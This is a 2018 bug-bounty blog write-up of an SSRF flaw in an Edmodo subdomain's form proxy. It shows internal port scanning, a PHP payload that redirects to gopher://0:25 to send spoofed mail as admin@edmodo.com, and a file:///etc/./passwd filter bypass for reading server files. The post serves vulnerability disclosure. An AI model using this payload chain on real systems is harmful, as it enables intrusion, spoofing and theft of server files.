• Twitter
  • Facebook
  • Youtube

Monday, May 21, 2018

Getting read access on Edmodo Production Server by exploiting SSRF



Hey Mates!
This is Mustafa Khan, Two weeks back I was planing to hunt some bounty sites to get some $$ but had some private programs and most of them seems to be secured and most of the researchers hunted it before me so had zero luck. 😞
Since I was disappointed and got bored so I thought to retest The Great Edmodo. while scanning for subdomains I got some interesting subdomains and starting to explore it. While checking each of the subdomains I chose my target which was Edmodo.

In this writeup I am going to disclose my recent finding of Edmodo. I found an SSRF vulnerability by exploiting which i was able to gain Read-access on their production server.

While exploring their services and subdomains I came across a subdomain ‘partnerships.edmodo.com’. This domain was having a registration area where publishers can register by submitting a form. The site was basically using Wordpress CMS and I tested it accordingly but wasn’t able to exploit the CMS as it was using the latest and secure version. So I turned on my interception proxy(Burp suite) and monitored each and every request and found that while writing data to the form a POST request was being sent to the following URL:

https://partnerships.edmodo.com/wp-content/themes/edmodo-developers/form-proxy.php?url=https://www.edmodo.com/index/
ajax-check-in-db


Seems like the form-proxy.php was somehow sending data to the file ajax-check-in-db, I tried replacing ‘url’ parameters value to http://my-ip-address and I was able to get a GET request to my server! Next I tried using http://127.0.0.1:80 but that didn’t worked! So I tried using ‘localhost’ and http://localhost:22 returned the following response:

{“status”:{“http_code”:0},”contents”:false}

Alright, so that was a negative response, I tried to see if SMTP service was enabled so I used http://localhost:25 and got the following response:

{“status”:{“http_code”:0},”contents”:”200 pod-200279 ESMTP Postfix (Ubuntu)\r\n221 2.7.0 Error: I can break rules, too. Goodbye.\r\n”}

Bingo! I was able to grab the SMTP banner! Now I was able to do an internal port scan using this SSRF vulnerability. I used burpsuite intruder in order to find other ports by including a range of ports and had a different response for open ports. I was able to grab banners of FTP,SSH and some other services as well.

Alright, now what next?

After that i ran another burp intruder and detected different schemes being used i found many of them were enabled and the most interesting one was the Gopher. As we know SMTP can be exploited if we have Gopher protocol enabled so I tried to check if gopher is enabled and it was enabled! There were other schemes available as well such as ftp and some other.

Now the next thing was, I have to inject CRLF and new line characters and have to pass my arguments to SMTP service via Gopher protocol. Using gopher protocol we are able to communicate with these kind of services so I created a PHP file on my server having the following code:


<?php
        $commands = array(
                ‘HELLO victim.com’,
                ‘MAIL FROM: <admin@edmodo.com>’,
                ‘RCPT To: <MYEMAIL@gmail.com>’,
                ‘DATA’,
                ‘Subject: WOOT’,
                ‘woot woot! Edmodo PWNED 😛’,
                ‘.’
        );

        $payload = implode(‘%0A’, $commands);

        header(‘Location: gopher://0:25/_'.$payload);
?>

after setting the url parameter to the path of my PHP file i was able to redirect the vulnerable application to the Gopher scheme having my payload and i was able to communicate with the SMTP service! I was able to receive email from admin@edmodo.com ! Using this I was able to send emails from their server!


Now here comes the interesting part. The ‘file’ scheme was also available using which I was able to read files on their server. I tried accessing file:///etc/hosts and I was able to get the content of hosts file:


But when I tried file:///etc/passwd it returned an Error, there might be some kind of firewall detecting the signature. Kudos to Eric! I used a ‘./‘ as Eric told me and the final Url was file:///etc/./passwd and I was able to get the content of passed file!


Now we got read access over their production server! I was able to read any file of their server plus i was able to communicate with their internal hosts, do internal port scans, make requests from server and many other things!

Bundles of thanks to the following Good friends of mine for helping me out to take this bug to the next level. {Shawar Khan, Zain Sabahat, Eric johnson}

Want my services?

Get in touch with me